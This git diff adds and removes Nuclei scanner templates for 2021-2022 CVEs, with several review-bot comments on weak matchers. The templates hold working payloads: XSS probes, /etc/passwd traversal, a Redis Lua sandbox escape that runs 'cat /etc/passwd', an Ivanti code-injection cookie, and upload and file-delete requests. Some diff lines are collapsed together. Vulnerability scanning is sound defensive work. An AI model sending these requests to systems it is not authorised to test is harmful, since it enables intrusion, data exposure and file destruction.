+ - type: word
+ part: body
+ words:
+ - "NetBiblio"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/27
diff --git a/nuclei-templates/CVE-2021/cve-2021-42565.yaml b/nuclei-templates/CVE-2021/cve-2021-42565.yaml
new file mode 100644
index 0000000000..bd4c2bc4c6
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-42565.yaml
@@ -0,0 +1,42 @@
+id: CVE-2021-42565
+
+info:
+ name: myfactory FMS - Reflected Cross-Site Scripting
+ author: madrobot
+ severity: medium
+ description: myfactory.FMS before 7.1-912 allows cross-site scripting via the UID parameter.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-42565
+ - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms
+ - https://www.redteam-pentesting.de/advisories/rt-sa-2021-001
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-42565
+ cwe-id: CWE-79
+ tags: cve,cve2021,myfactory,xss
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+ - '{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: body
+ words:
+ - ""
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+# Enhanced by mp on 2022/02/27
diff --git a/nuclei-templates/CVE-2021/CVE-2021-43496.yaml b/nuclei-templates/CVE-2021/cve-2021-43496.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-43496.yaml
rename to nuclei-templates/CVE-2021/cve-2021-43496.yaml
diff --git a/nuclei-templates/CVE-2021/cve-2021-44529.yaml b/nuclei-templates/CVE-2021/cve-2021-44529.yaml
new file mode 100644
index 0000000000..2a56a93b6f
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-44529.yaml
@@ -0,0 +1,41 @@
+id: CVE-2021-44529
+
+info:
+ name: Ivanti EPM Cloud Services Appliance Code Injection
+ author: duty_1g,phyr3wall,Tirtha
+ severity: critical
+ description: Ivanti EPM Cloud Services Appliance (CSA) before version 4.6.0-512 is susceptible to a code injection vulnerability because it allows an unauthenticated user to execute arbitrary code with limited permissions (nobody).
+ reference:
+ - https://forums.ivanti.com/s/article/SA-2021-12-02
+ - https://twitter.com/Dinosn/status/1505273954478530569
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-44529
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-44529
+ cwe-id: CWE-94
+ metadata:
+ shodan-query: title:"LANDesk(R) Cloud Services Appliance"
+ tags: cve,cve2021,ivanti,epm,csa,injection
+
+requests:
+ - raw:
+ - |
+ GET /client/index.php HTTP/1.1
+ Host: {{Hostname}}
+ Cookie: ab=ab; c=cGhwaW5mbygpOw==; d=; e=;
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "phpinfo()"
+ - "Cloud Services Appliance"
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/03/28
diff --git a/nuclei-templates/CVE-2021/cve-2021-45043.yaml b/nuclei-templates/CVE-2021/cve-2021-45043.yaml
new file mode 100644
index 0000000000..407b0f617e
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-45043.yaml
@@ -0,0 +1,40 @@
+id: CVE-2021-45043
+
+info:
+ name: HD-Network Realtime Monitoring System 2.0 - Local File Inclusion
+ author: Momen Eldawakhly,Evan Rubinstein
+ severity: high
+ description: Instances of HD-Network Realtime Monitoring System version 2.0 are vulnerable to a Local File Inclusion vulnerability which allows remote unauthenticated attackers to view confidential information.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-45043
+ - https://www.exploit-db.com/exploits/50588
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45043
+ - https://cyberguy0xd1.medium.com/my-cve-2021-45043-lfi-write-up-441dad30dd7f
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2021-45043
+ cwe-id: CWE-22
+ metadata:
+ google-dork: intitle:"HD-Network Real-time Monitoring System V2.0"
+ tags: cve,cve2021,hdnetwork,lfi,iot,camera
+
+requests:
+ - raw:
+ - |
+ GET /language/lang HTTP/1.1
+ Host: {{Hostname}}
+ Referer: {{BaseURL}}
+ Cookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=; s_type=; s_devtype=
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/28
diff --git a/nuclei-templates/CVE-2021/cve-2021-45092.yaml b/nuclei-templates/CVE-2021/cve-2021-45092.yaml
new file mode 100644
index 0000000000..60a13263b4
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-45092.yaml
@@ -0,0 +1,31 @@
+id: CVE-2021-45092
+
+info:
+ name: Thinfinity Iframe Injection
+ author: danielmofer
+ severity: critical
+ description: A vulnerability exists in Thinfinity VirtualUI in a function located in /lab.html reachable which by default could allow IFRAME injection via the "vpath" parameter.
+ reference:
+ - https://github.com/cybelesoft/virtualui/issues/2
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-44848
+ - https://www.tenable.com/cve/CVE-2021-45092
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-45092
+ cwe-id: CWE-74
+ tags: cve,cve2021,injection,iframe,thinfinity
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/lab.html?vpath=//example.com"
+
+ matchers:
+ - type: regex
+ regex:
+ - ".*vpath.*"
+ - "thinfinity"
+ condition: and
+
+# Enhanced by mp on 2022/02/28
diff --git a/nuclei-templates/CVE-2021/cve-2021-45380.yaml b/nuclei-templates/CVE-2021/cve-2021-45380.yaml
new file mode 100644
index 0000000000..70cea0b272
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-45380.yaml
@@ -0,0 +1,40 @@
+id: CVE-2021-45380
+
+info:
+ name: AppCMS - Reflected Cross-Site Scripting
+ author: pikpikcu
+ severity: medium
+ description: AppCMS 2.0.101 has a cross-site scripting vulnerability in \templates\m\inc_head.php.
+ reference:
+ - https://github.com/source-trace/appcms/issues/8
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-45380
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-45380
+ cwe-id: CWE-79
+ tags: cve,cve2021,appcms,xss
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"">'
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/28
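Review bot: The only matcher in the CVE-2021-45092 template (`".*vpath.*"` and `"thinfinity"`) never checks that the supplied `//example.com` value comes back in the response, so any lab.html page of the product that mentions vpath, patched or not, is reported at severity critical. Add a pattern that can only match when the parameter is reflected, for example `- "example\\.com"` under the same `condition: and`, together with a `status: 200` matcher; the exact reflected form is not visible in this hunk and should be confirmed against a known-vulnerable instance. The second reference also points at CVE-2021-44848 on NVD while `cve-id` is CVE-2021-45092, which needs either correcting or a word of explanation in the description.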
diff --git a/nuclei-templates/CVE-2021/cve-2021-45428.yaml b/nuclei-templates/CVE-2021/cve-2021-45428.yaml deleted file mode 100644 index ec30ef8f6c..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-45428.yaml +++ /dev/null @@ -1,48 +0,0 @@ -id: CVE-2021-45428 - -info: - name: Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload - author: gy741 - severity: critical - description: | - TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats. - reference: - - https://drive.google.com/file/d/1wM1SPOfB9mH2SES7cAmlysuI9fOpFB3F/view?usp=sharing - - http://packetstormsecurity.com/files/167101/TLR-2005KSH-Arbitrary-File-Upload.html - - https://nvd.nist.gov/vuln/detail/CVE-2021-45428 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-45428 - cwe-id: CWE-639 - metadata: - shodan-query: http.html:"TLR-2005KSH" - verified: "true" - tags: cve,cve2021,telesquare,intrusive,fileupload,packetstorm - -requests: - - raw: - - | - GET /{{randstr}}.txt HTTP/1.1 - Host: {{Hostname}} - - - | - PUT /{{randstr}}.txt HTTP/1.1 - Host: {{Hostname}} - - CVE-2021-45428 - - - | - GET /{{randstr}}.txt HTTP/1.1 - Host: {{Hostname}} - - req-condition: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - 'status_code_1 == 404 && status_code_2 == 201' - - 'contains(body_3, "CVE-2021-45428") && status_code_3 == 200' - condition: and - -# Enhanced by mp on 2022/05/19 diff --git a/nuclei-templates/CVE-2021/cve-2021-45968.yaml b/nuclei-templates/CVE-2021/cve-2021-45968.yaml new file mode 100644 index 0000000000..ca513acd7e --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-45968.yaml 
@@ -0,0 +1,41 @@
+id: CVE-2021-45968
+
+info:
+ name: Pascom CPS Path Traversal
+ author: dwisiswant0
+ severity: high
+ description: |
+ Pascom version packaged with Cloud Phone System (CPS)
+ versions before 7.20 contains a known path traversal issue
+ reference:
+ - https://kerbit.io/research/read/blog/4
+ - https://www.pascom.net/doc/en/release-notes/
+ - https://tutorialboy24.blogspot.com/2022/03/the-story-of-3-bugs-that-lead-to.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2021-45968
+ cwe-id: CWE-22
+ tags: cve,cve2021,pascom,lfi
+
+requests:
+ - raw:
+ - |
+ GET /services/pluginscript/ HTTP/1.1
+ Host: {{Hostname}}
+
+ - | # Double parent to access CMS index
+ GET /services/pluginscript/..;/..;/ HTTP/1.1
+ Host: {{Hostname}}
+
+ - | # Verifying CMS
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+
+ req-condition: true
+ matchers:
+ - type: dsl
+ dsl:
+ - "status_code_2 != status_code_1"
+ - "contains(body_2, 'pascom GmbH & Co KG') || contains(body_3, 'pascom GmbH & Co KG')" # Verifying CMS
+ condition: and
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2021/cve-2021-46379.yaml b/nuclei-templates/CVE-2021/cve-2021-46379.yaml
new file mode 100644
index 0000000000..d27fe97f68
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-46379.yaml
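Review bot: The second DSL clause is satisfied by `contains(body_3, 'pascom GmbH & Co KG')` alone, and request 3 is a plain `GET /`, so that clause only identifies the product; combined with `status_code_2 != status_code_1`, any Pascom host that answers the `..;/..;/` path with a different error code than the base path is reported as vulnerable. The evidence should come from response 2 itself, e.g. `- "status_code_2 == 200 && contains(body_2, 'pascom GmbH & Co KG')"`, with request 3 kept only as a fingerprint. That a successful traversal returns 200 is an assumption to confirm against a vulnerable build. A `remediation:` line naming the fixed release (the description says versions before 7.20 are affected) would also help whoever triages the finding.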
@@ -0,0 +1,31 @@
+id: CVE-2021-46379
+
+info:
+ name: D-Link DIR850 ET850-1.08TRb03 - Open Redirect
+ author: 0x_Akoko
+ severity: medium
+ description: DLink DIR850 ET850-1.08TRb03 is affected by an incorrect access control vulnerability through URL redirection to untrusted site.
+ reference:
+ - https://www.opencve.io/cve/CVE-2021-46379
+ - https://drive.google.com/file/d/1rrlwnIxSHEoO4SMAHRPKZSRzK5MwZQRf/view
+ - https://www.cvedetails.com/cve/CVE-2021-46379
+ - https://www.dlink.com/en/security-bulletin/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-46379
+ cwe-id: CWE-601
+ metadata:
+ verified: "true"
+ tags: cve,cve2021,redirect,dlink,router
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/boafrm/formWlanRedirect?redirect-url=http://example.com&wlan_id=1'
+
+ matchers:
+ - type: regex
+ part: header
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/nuclei-templates/CVE-2021/cve-2021-46387.yaml b/nuclei-templates/CVE-2021/cve-2021-46387.yaml
new file mode 100644
index 0000000000..1b5473b83f
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-46387.yaml
@@ -0,0 +1,43 @@ +id: CVE-2021-46387 + +info: + name: Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting + author: DhiyaneshDk + severity: medium + description: ZyXEL ZyWALL 2 Plus Internet Security Appliance is affected by Cross Site Scripting (XSS). Insecure URI handling leads to bypass security restriction to achieve Cross Site Scripting, which allows an attacker able to execute arbitrary JavaScript codes to perform multiple attacks such as clipboard hijacking and session hijacking. + reference: + - https://www.exploit-db.com/exploits/50797 + - https://nvd.nist.gov/vuln/detail/CVE-2021-46387 + - https://www.zyxel.com/us/en/support/security_advisories.shtml + - https://drive.google.com/drive/folders/1_XfWBLqxT2Mqt7uB663Sjlc62pE8-rcN?usp=sharing + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-46387 + cwe-id: CWE-79 + metadata: + shodan-query: http.title:"Zywall2Plus" + tags: cve,cve2021,xss,zyxel + +requests: + - method: GET + path: + - '{{BaseURL}}/Forms/rpAuth_1?id=
' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '
' + - 'Entry Error' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-46424.yaml b/nuclei-templates/CVE-2021/cve-2021-46424.yaml new file mode 100644 index 0000000000..2b6d737b8a --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-46424.yaml @@ -0,0 +1,44 @@ +id: CVE-2021-46424 + +info: + name: Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete + author: gy741 + severity: critical + description: Telesquare TLR-2005KSH 1.0.0 is affected by an arbitrary file deletion vulnerability that allows a remote attacker to delete any file, even system internal files, via a DELETE request. + reference: + - https://dl.packetstormsecurity.net/2205-exploits/tlr2005ksh-filedelete.txt + - https://drive.google.com/drive/folders/1_e3eJ8fzhCWnCkoRpbLoyQecuKkPR4OD?usp=sharing + - http://packetstormsecurity.com/files/167127/TLR-2005KSH-Arbitrary-File-Delete.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-46424 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H + cvss-score: 9.1 + cve-id: CVE-2021-46424 + cwe-id: CWE-306 + metadata: + shodan-query: http.html:"TLR-2005KSH" + verified: "true" + tags: cve,cve2021,telesquare,intrusive,packetstorm + +requests: + - raw: + - | + GET /images/icons_title.gif HTTP/1.1 + Host: {{Hostname}} + + - | + DELETE /images/icons_title.gif HTTP/1.1 + Host: {{Hostname}} + + - | + GET /images/icons_title.gif HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - "status_code_1 == 200 && status_code_2 == 204 && status_code_3 == 404" + +# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2022/cve-2022-0148.yaml b/nuclei-templates/CVE-2022/CVE-2022-0148.yaml similarity index 100% rename from nuclei-templates/CVE-2022/cve-2022-0148.yaml rename to nuclei-templates/CVE-2022/CVE-2022-0148.yaml 
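Review bot: In the CVE-2021-46424 template the `DELETE /images/icons_title.gif` request removes a real asset from the device and nothing restores it or tells the operator, so every confirmed finding leaves the target's web interface modified. The `intrusive` tag is present, but the `description` should state the side effect explicitly, for example `Note: this check deletes /images/icons_title.gif on a vulnerable device and does not restore it.` The matcher also requires `status_code_1 == 200`, so a device that has already been scanned once (file gone, first GET returns 404) will no longer be detected; that limitation belongs in the description as well. `matchers-condition: and` is redundant with a single matcher.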
diff --git a/nuclei-templates/CVE-2022/CVE-2022-0165.yaml b/nuclei-templates/CVE-2022/CVE-2022-0165.yaml deleted file mode 100644 index a8ed3c52f2..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-0165.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: CVE-2022-0165 -info: - name: WordPress Page Builder KingComposer <=2.9.6 - Open Redirect - author: akincibor - severity: high - description: WordPress Page Builder KingComposer 2.9.6 and prior does not validate the id parameter before redirecting the user to it via the kc_get_thumbn AJAX action (which is available to both unauthenticated and authenticated users). - reference: - - https://wpscan.com/vulnerability/906d0c31-370e-46b4-af1f-e52fbddd00cb - - https://nvd.nist.gov/vuln/detail/CVE-2022-0165 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - cvss-score: 8.80 - cve-id: CVE-2022-0165 - cwe-id: CWE-601 - tags: cve,cve2022,wp-plugin,redirect,wordpress,wp -requests: - - method: GET - path: - - "{{BaseURL}}/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://interact.sh" - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - -# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/CVE-2022/CVE-2022-0201.yaml b/nuclei-templates/CVE-2022/CVE-2022-0201.yaml deleted file mode 100644 index fa91598350..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-0201.yaml +++ /dev/null 
@@ -1,31 +0,0 @@ -id: CVE-2022-0201 -info: - name: WordPress Permalink Manager < 2.2.15 - Reflected Cross-Site Scripting - author: Akincibor - severity: medium - description: The plugins do not sanitise and escape query parameters before outputting them back in the debug page, leading to a Reflected Cross-Site Scripting issue. - reference: - - https://wpscan.com/vulnerability/f274b0d8-74bf-43de-9051-29ce36d78ad4 - - https://plugins.trac.wordpress.org/changeset/2656512 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-0201 - cwe-id: CWE-79 - tags: cve,cve2022,xss,wordpress,wp-plugin -requests: - - method: GET - path: - - '{{BaseURL}}/index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1' - matchers-condition: and - matchers: - - type: word - part: body - words: - - '' - - 'pm_query' - condition: and - - type: word - part: header - words: - - text/html diff --git a/nuclei-templates/CVE-2022/cve-2022-0271.yaml b/nuclei-templates/CVE-2022/CVE-2022-0271.yaml similarity index 100% rename from nuclei-templates/CVE-2022/cve-2022-0271.yaml rename to nuclei-templates/CVE-2022/CVE-2022-0271.yaml diff --git a/nuclei-templates/CVE-2022/CVE-2022-0288.yaml b/nuclei-templates/CVE-2022/CVE-2022-0288.yaml new file mode 100644 index 0000000000..7023ac1948 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-0288.yaml 
@@ -0,0 +1,38 @@
+id: CVE-2022-0288
+info:
+ name: Ad Inserter < 2.7.10 - Reflected Cross-Site Scripting
+ author: DhiyaneshDK
+ severity: medium
+ description: The plugins do not sanitise and escape the html_element_selection parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting.
+ remediation: Fixed in version 2.7.12
+ reference:
+ - https://wpscan.com/vulnerability/27b64412-33a4-462c-bc45-f81697e4fe42
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2022-0288
+ cwe-id: CWE-79
+ tags: cve,cve2022,wordpress,xss
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}"
+ headers:
+ Content-Type: "application/x-www-form-urlencoded"
+ body: |
+ html_element_selection=
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ part: body
+ words:
+ - ""
+ - "ad-inserter"
+ condition: and
+ - type: word
+ part: header
+ words:
+ - "text/html"
diff --git a/nuclei-templates/CVE-2022/CVE-2022-0422.yaml b/nuclei-templates/CVE-2022/CVE-2022-0422.yaml
new file mode 100644
index 0000000000..3e2de9127d
--- /dev/null
+++ b/nuclei-templates/CVE-2022/CVE-2022-0422.yaml
@@ -0,0 +1,41 @@
+id: CVE-2022-0422
+info:
+ name: WordPress White Label MS < 2.2.9 - Reflected Cross-Site Scripting
+ author: random-robbie
+ severity: medium
+ description: The plugin does not sanitise and validate the wlcms[_login_custom_js] parameter before outputting it back in the response while previewing, leading to a Reflected Cross-Site Scripting issue back in the response, leading to reflected cross-site scripting.
+ reference:
+ - https://wpscan.com/vulnerability/429be4eb-8a6b-4531-9465-9ef0d35c12cc
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0422
+ - https://plugins.trac.wordpress.org/changeset/2672615
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2022-0422
+ cwe-id: CWE-79
+ tags: cve,cve2022,wordpress,xss,wp-plugin
+requests:
+ - raw:
+ - |
+ POST /wp-login.php?wlcms-action=preview HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ wlcms%5B_login_custom_js%5D=alert%28%2FXSS%2F%29%3B
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "alert(/XSS/);"
+ - type: word
+ part: body
+ words:
+ - "wlcms-login-wrapper"
+ - type: word
+ part: header
+ words:
+ - text/html
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2022/CVE-2022-0482.yaml b/nuclei-templates/CVE-2022/CVE-2022-0482.yaml
deleted file mode 100644
index 7ee41afa5e..0000000000
--- a/nuclei-templates/CVE-2022/CVE-2022-0482.yaml
+++ /dev/null
@@ -1,57 +0,0 @@ -id: CVE-2022-0482 - -info: - name: Easy!Appointments <1.4.3 - Broken Access Control - author: francescocarlucci,opencirt - severity: critical - description: | - Easy!Appointments prior to 1.4.3 allows exposure of Private Personal Information to an unauthorized actor via the GitHub repository alextselegidis/easyappointments. - reference: - - https://huntr.dev/bounties/2fe771ef-b615-45ef-9b4d-625978042e26/ - - https://github.com/alextselegidis/easyappointments - - https://opencirt.com/hacking/securing-easy-appointments-cve-2022-0482/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-0482 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N - cvss-score: 9.1 - cve-id: CVE-2022-0482 - cwe-id: CWE-863 - tags: cve,cve2022,easyappointments,huntr - -requests: - - raw: - - | - GET / HTTP/1.1 - Host: {{Hostname}} - Accept: */* - - - | - POST /index.php/backend_api/ajax_get_calendar_events HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - csrfToken={{csrf_token}}&startDate=2022-01-01&endDate=2022-01-01 - - extractors: - - type: kval - part: header - name: csrf_token - kval: - - "csrfCookie" - internal: true - - cookie-reuse: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - '"appointments":' - - '"unavailables":' - condition: and - -# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2022/CVE-2022-0540.yaml b/nuclei-templates/CVE-2022/CVE-2022-0540.yaml deleted file mode 100644 index 21d2d6f4d3..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-0540.yaml +++ /dev/null 
@@ -1,34 +0,0 @@ -id: CVE-2022-0540 -info: - name: Atlassian Jira Seraph - Authentication Bypass - author: DhiyaneshDK - severity: critical - description: | - Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0. - reference: - - https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-0540 - - https://confluence.atlassian.com/display/JIRA/Jira+Security+Advisory+2022-04-20 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-0540 - cwe-id: CWE-287 - metadata: - shodan-query: http.component:"Atlassian Jira" - tags: cve,cve2022,atlassian,jira,exposure,auth-bypass -requests: - - method: GET - path: - - '{{BaseURL}}/InsightPluginShowGeneralConfiguration.jspa;' - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'General Insight Configuration' - - type: status - status: - - 200 - -# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2022/CVE-2022-0543.yaml b/nuclei-templates/CVE-2022/CVE-2022-0543.yaml deleted file mode 100644 index 00d78f467c..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-0543.yaml +++ /dev/null 
@@ -1,35 +0,0 @@ -id: CVE-2022-0543 -info: - name: Redis Sandbox Escape - Remote Code Execution - author: dwisiswant0 - severity: critical - description: | - This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The - vulnerability was introduced by Debian and Ubuntu Redis packages that - insufficiently sanitized the Lua environment. The maintainers failed to - disable the package interface, allowing attackers to load arbitrary libraries. - reference: - - https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce - - https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis - - https://bugs.debian.org/1005787 - - https://www.debian.org/security/2022/dsa-5081 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 - cve-id: CVE-2022-0543 - metadata: - shodan-query: redis_version - tags: cve,cve2022,network,redis,unauth,rce,kev -network: - - inputs: - - data: "eval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"cat /etc/passwd\", \"r\"); local res = f:read(\"*a\"); f:close(); return res' 0\r\n" - host: - - "{{Hostname}}" - - "{{Host}}:6379" - read-size: 64 - matchers: - - type: regex - regex: - - "root:.*:0:0:" - -# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2022/cve-2022-0591.yaml b/nuclei-templates/CVE-2022/CVE-2022-0591.yaml similarity index 100% rename from nuclei-templates/CVE-2022/cve-2022-0591.yaml rename to nuclei-templates/CVE-2022/CVE-2022-0591.yaml diff --git a/nuclei-templates/CVE-2022/CVE-2022-0653.yaml b/nuclei-templates/CVE-2022/CVE-2022-0653.yaml new file mode 100644 index 0000000000..e06a6c604a --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-0653.yaml 
@@ -0,0 +1,37 @@
+id: CVE-2022-0653
+
+info:
+ name: Wordpress Profile Builder Plugin Cross-Site Scripting
+ author: dhiyaneshDk
+ severity: medium
+ reference:
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-0653
+ - https://www.wordfence.com/blog/2022/02/reflected-cross-site-scripting-vulnerability-patched-in-wordpress-profile-builder-plugin/
+ tags: cve,cve2022,wordpress,xss,wp-plugin
+ description: "The Profile Builder User Profile & User Registration Forms WordPress plugin is vulnerable to cross-site scripting due to insufficient escaping and sanitization of the site_url parameter found in the ~/assets/misc/fallback-page.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user clicks on a specially crafted link by an attacker. This affects versions up to and including 3.6.1.\n\n."
+ remediation: Upgrade to version 3.6.5 or later.
+ classification:
+ cve-id: CVE-2022-0653
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'here'
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/28
diff --git a/nuclei-templates/CVE-2022/cve-2022-0692.yaml b/nuclei-templates/CVE-2022/CVE-2022-0692.yaml
